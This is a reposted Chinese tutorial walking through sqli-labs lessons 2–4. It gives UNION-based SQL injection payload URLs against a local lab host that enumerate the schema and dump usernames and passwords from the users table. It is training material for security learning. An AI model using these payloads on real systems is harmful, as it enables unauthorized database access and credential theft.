sqli-labs教程第二章(Less-2-Less-4)

admin
admin
admin
138693
文章
114
评论
2022年10月8日08:39:14评论39 views字数 2770阅读9分14秒阅读模式

sqli-labs教程第二章(Less-2-Less-4)




声明




本文作者:CloudStrife(玄螭安全实验室-核心成员)  

玄螭安全实验室拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明,文章来源等全部内容。未经玄螭安全实验室允许,不得修改文章内容,不能以任何方式将其用于商业目的。


Sqli-labs教程第二章(Less-2-Less-4


目录:

1、Less-2

2、Less-3

3、Less-4


1、Less-2

进入Less-2,和第一题一样,输入

http://192.168.85.137/sqli-labs-master/Less-2/?id=1'

页面提示错误,接着再输入

http://192.168.85.137/sqli-labs-master/Less-2/?id=1''

还是提示错误。那么该题目应该是数字型注入,不需要加引号,直接跟上union即可。所以payload如下

http://192.168.85.137/sqli-labs-master/Less-2/?id=-1 union select 1,2,database() --+  获得数据库名

http://192.168.85.137/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+ 获取表名

http://192.168.85.137/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns

where table_schema='security' and table_name='users' --+  获取users表的字段

http://192.168.85.137/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(username),3 from security.users --+ 获取users表中username值

http://192.168.85.137/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(password),3 from security.users --+ 获取users表中password值

此题结束。


2、Less-3

接下来看到Less-3,单引号报错,双引号不报错,报错信息如下。

sqli-labs教程第二章(Less-2-Less-4)

显示''1'') LIMIT 0,1'附近有语法错误,那么将其闭合即可。payload如下

http://192.168.85.137/sqli-labs-master/Less-3/?id=-1') union select 1,2,database() --+  获得数据库名

http://192.168.85.137/sqli-labs-master/Less-3/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+ 获取表名

http://192.168.85.137/sqli-labs-master/Less-3/?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns

where table_schema='security' and table_name='users' --+  获取users表的字段

http://192.168.85.137/sqli-labs-master/Less-3/?id=-1') union select 1,group_concat(username),3 from security.users --+ 获取users表中username值

http://192.168.85.137/sqli-labs-master/Less-3/?id=-1') union select 1,group_concat(password),3 from security.users --+ 获取users表中password值

查看源代码,在id外,添加了括号进行包围,所以使用-1')就可以进行注入。

sqli-labs教程第二章(Less-2-Less-4)


3、Less-4

单引号不报错,双引号报错,查看报错信息。

sqli-labs教程第二章(Less-2-Less-4)

提示我们在'"1"") LIMIT 0,1'有语法错误,那么换成双引号,就可以闭合了。payload如下。

http://192.168.85.137/sqli-labs-master/Less-4/?id=-1") union select 1,2,database() --+  获得数据库名

http://192.168.85.137/sqli-labs-master/Less-4/?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables

where table_schema='security' --+ 获取表名

http://192.168.85.137/sqli-labs-master/Less-4/?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns

where table_schema='security' and table_name='users' --+  获取users表的字段

http://192.168.85.137/sqli-labs-master/Less-4/?id=-1") union select 1,group_concat(username),3 from security.users --+ 获取users表中username值

http://192.168.85.137/sqli-labs-master/Less-4/?id=-1") union select 1,group_concat(password),3 from security.users --+ 获取users表中password值

查看源代码,在id外,添加了双引号进行包围,所以使用-1")就可以进行注入。

sqli-labs教程第二章(Less-2-Less-4)


看完了右下角点个赞噢   更多安全资料等你拿

sqli-labs教程第二章(Less-2-Less-4)


原文始发于微信公众号(玄螭安全实验室):sqli-labs教程第二章(Less-2-Less-4)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月8日08:39:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   sqli-labs教程第二章(Less-2-Less-4)http://cn-sec.com/archives/1336152.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息